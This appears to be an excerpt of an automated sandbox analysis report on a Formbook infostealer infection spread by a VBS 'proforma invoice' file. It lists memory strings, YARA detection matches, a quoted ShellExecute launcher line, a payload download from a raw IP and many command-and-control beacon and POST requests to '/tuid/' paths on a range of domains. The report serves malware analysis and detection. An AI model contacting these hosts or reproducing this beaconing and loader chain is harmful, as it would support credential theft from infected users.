Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/dnssec
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/domeny
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/domeny#m-certifikace
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/jak-na-tvorbu-webu
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/klientska-zona/zakaznicka-podpora
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/o-spolecnosti
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/o-spolecnosti/kariera
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/o-spolecnosti/kontakty
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/o-spolecnosti/media
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/o-spolecnosti/obchodni-podminky
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/o-spolecnosti/rikaji-o-nas-zakaznici
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/objednavka/login
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/spoluprace
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/upozorneni
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/webforward-mailforward
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/weby/mojestranky
Source: explorer.exe, 00000016.00000000.2955017038.000000000D50D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3358987218.000000000D518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3211223410.000000000D518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3231171158.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3126642750.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380505737.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2979739268.0000000010BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3094084292.000000000D50D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/uk-climate-activists-face-prison-for-blocking-highz
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.superstranka.cz/
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.vtubber.com/tuid/?m4bd=vE0t2WxjBi8H4KsoCXQPFaaEcnaL0cW4rsHN0mKSQSi6rgkDy1GsjEniIX065GWyc
Source: unknown HTTP traffic detected: POST /tuid/ HTTP/1.1Host: www.muziclips.comConnection: closeContent-Length: 174830Cache-Control: no-cacheOrigin: http://www.muziclips.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.muziclips.com/tuid/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: unknown DNS traffic detected: queries for: www.maximilianvonah.com
Source: global traffic HTTP traffic detected: GET /WHvBvQsIuWdD218.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.169Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=csUEPuyljQauctU/Z8NbC9ms5fC6XWDYEeq9yCIh8wbky0EJAlqn2MT949GlS8zP8lU0&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.maximilianvonah.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=83varyKolJl8CknPQYlgcSGzNVcyrkZOB+D5ZpiMClZzhWRqo67UpTDjwxWvk8XKYz02 HTTP/1.1Host: www.emitacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=uDqjMC0TPYTc8b3BnUYVD5r+dOFIeilgQYFIqhS/31oxMeb2xRi82/WbnXFAxC3dxs3o HTTP/1.1Host: www.linuxizes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=gaITN7i6/i636J8ZdAepXbFiroAuKTRwrMdc4y4CfBKs7kJVyv+3PWgk2/xmwUEu5s/a&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.muziclips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=cJ4k7DdOtYQngKRIFYz9xfmhcqtIvpGa85+jixf523tlwbXsspzXRN02o1TtG1NqJ3tW HTTP/1.1Host: www.ghanesa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=Il3LuUn17XOwO1L66Bn3hjajRgSpI6QuPLSUULkpfr+VyFXt3qGq+SpnJy79y37sHeXr HTTP/1.1Host: www.worldbrands.wineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.programmedsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=LeABM0dRx+cjh3zMeGVoLpl9dcpUDuhE6Ym2dCR4YXuE8jour2rN+gEOINsGd1piKr34&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.secureartist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=x1lqSWX2LKO1JKV9bkchYXFCTPqYoW8UylSztnXFuZ2/7+2KqJfWLK3RcwQMnMv5S2vv HTTP/1.1Host: www.ymsb.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=9gXeVPWqRuIX9bIiSDPSAo7Wpwb+1c/G4dykJbOMN5RD0q8y2Pxv3NPChbg6lQ1LsmOi&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.coolarts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=ZWTx79zL1WMN2pQcyBYApaV2+B3RRlV7SjHEUZJPfkwT7h+aiOtTufuSzn8LCa71qLhI HTTP/1.1Host: www.ap-render.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=5V7M8j5VuGkiy9NL3tIypAJy22VFPCeBH5Oh5nibDDbINvkaWpZ6bb8s5rlg19isjBzt&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.receiveprim.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=mghAatraeoVXXTpIg6GKnKl23LbAAQF/82d90oG2Rt9sZLGICR2WykimnZjjCp2p0vtb HTTP/1.1Host: www.itsfindia.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=p0pyYx380zTi+CiqScB4rLgyoRdRZyFFdRM5Rh8HyCuUL1S9LlJi1JnCbSa7CQi/RAeh&8pB=3fY8ljB8rp-H HTTP/1.1Host: www.svgjp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=Xot5lTp2K0ClnYt2dL3qfCxcaVN+/32Qk6xa6/2CoOF7guyvNDwTfZphG6kmH2ULd7pQ&8pB=3fY8ljB8rp-H HTTP/1.1Host: www.147bronzeway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=uDqjMC0TPYTc8b3BnUYVD5r+dOFIeilgQYFIqhS/31oxMeb2xRi82/WbnXFAxC3dxs3o HTTP/1.1Host: www.linuxizes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=cJ4k7DdOtYQngKRIFYz9xfmhcqtIvpGa85+jixf523tlwbXsspzXRN02o1TtG1NqJ3tW&8pB=3fY8ljB8rp-H HTTP/1.1Host: www.ghanesa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=HIOGqwzZ3Isl7OEwvKn7zxoCIrzNSH0uht2lzyEyFHfgP4651xyJdMCZXys0BRyGrE8f&8pB=3fY8ljB8rp-H HTTP/1.1Host: www.wwwf2dni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=Il3LuUn17XOwO1L66Bn3hjajRgSpI6QuPLSUULkpfr+VyFXt3qGq+SpnJy79y37sHeXr HTTP/1.1Host: www.worldbrands.wineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.programmedsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=LeABM0dRx+cjh3zMeGVoLpl9dcpUDuhE6Ym2dCR4YXuE8jour2rN+gEOINsGd1piKr34&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.secureartist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=x1lqSWX2LKO1JKV9bkchYXFCTPqYoW8UylSztnXFuZ2/7+2KqJfWLK3RcwQMnMv5S2vv HTTP/1.1Host: www.ymsb.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=9gXeVPWqRuIX9bIiSDPSAo7Wpwb+1c/G4dykJbOMN5RD0q8y2Pxv3NPChbg6lQ1LsmOi&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.coolarts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=ZWTx79zL1WMN2pQcyBYApaV2+B3RRlV7SjHEUZJPfkwT7h+aiOtTufuSzn8LCa71qLhI HTTP/1.1Host: www.ap-render.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=5V7M8j5VuGkiy9NL3tIypAJy22VFPCeBH5Oh5nibDDbINvkaWpZ6bb8s5rlg19isjBzt&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.receiveprim.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=mghAatraeoVXXTpIg6GKnKl23LbAAQF/82d90oG2Rt9sZLGICR2WykimnZjjCp2p0vtb HTTP/1.1Host: www.itsfindia.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=Sp+Vnoj41xF+X27kbZ2gbhhmlpTYO/ymXHQnMWpJpfoG8qqLVUKSMWMbMwd5uBvOkHI+&APPTx=9r9PSR HTTP/1.1Host: www.blueonb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=WEOQpGNSR38PhgWGQI/4C8NMlFMwGI3qKGQVHk5AxuPmXhsKWgjXW9kcijjoxdm/j8Qu&APPTx=9r9PSR HTTP/1.1Host: www.mojawapo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=cJ4k7DdOtYQngKRIFYz9xfmhcqtIvpGa85+jixf523tlwbXsspzXRN02o1TtG1NqJ3tW&APPTx=9r9PSR HTTP/1.1Host: www.ghanesa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=uDqjMC0TPYTc8b3BnUYVD5r+dOFIeilgQYFIqhS/31oxMeb2xRi82/WbnXFAxC3dxs3o HTTP/1.1Host: www.linuxizes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&APPTx=9r9PSR HTTP/1.1Host: www.programmedsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=mHFj8MSWDx8nkU1eAV++NnKhhWbL51TVGCJDIAbvrDEUS4qoSy90C4E1UO2kwJf1rSvR&APPTx=9r9PSR HTTP/1.1Host: www.hikingtaibah.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=vocXnNkofrtqV2skOi0toh6MZkzBPgY3NaQb1h7517U8PmTkl0G2bMX+HFjiIYqpZAQ5&APPTx=9r9PSR HTTP/1.1Host: www.xc8b49c6mnmdts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=Il3LuUn17XOwO1L66Bn3hjajRgSpI6QuPLSUULkpfr+VyFXt3qGq+SpnJy79y37sHeXr HTTP/1.1Host: www.worldbrands.wineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.programmedsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=LeABM0dRx+cjh3zMeGVoLpl9dcpUDuhE6Ym2dCR4YXuE8jour2rN+gEOINsGd1piKr34&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.secureartist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=x1lqSWX2LKO1JKV9bkchYXFCTPqYoW8UylSztnXFuZ2/7+2KqJfWLK3RcwQMnMv5S2vv HTTP/1.1Host: www.ymsb.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=9gXeVPWqRuIX9bIiSDPSAo7Wpwb+1c/G4dykJbOMN5RD0q8y2Pxv3NPChbg6lQ1LsmOi&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.coolarts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=ZWTx79zL1WMN2pQcyBYApaV2+B3RRlV7SjHEUZJPfkwT7h+aiOtTufuSzn8LCa71qLhI HTTP/1.1Host: www.ap-render.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=5V7M8j5VuGkiy9NL3tIypAJy22VFPCeBH5Oh5nibDDbINvkaWpZ6bb8s5rlg19isjBzt&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.receiveprim.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=mghAatraeoVXXTpIg6GKnKl23LbAAQF/82d90oG2Rt9sZLGICR2WykimnZjjCp2p0vtb HTTP/1.1Host: www.itsfindia.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=vE0t2WxjBi8H4KsoCXQPFaaEcnaL0cW4rsHN0mKSQSi6rgkDy1GsjEniIX065GWycDne&UlCp=CJEhZPH HTTP/1.1Host: www.vtubber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Source: Yara match File source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 1740, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: ielowutil.exe PID: 8008, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 7768, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: Initial file: Personaleg.ShellExecute Predelegat, Pseudogla & chr(34) & cowardli & chr(34), vbnullstring, vbnullstring, 0
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5200
Source: Unclear Proforma Invoice.vbs, type: SAMPLE Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
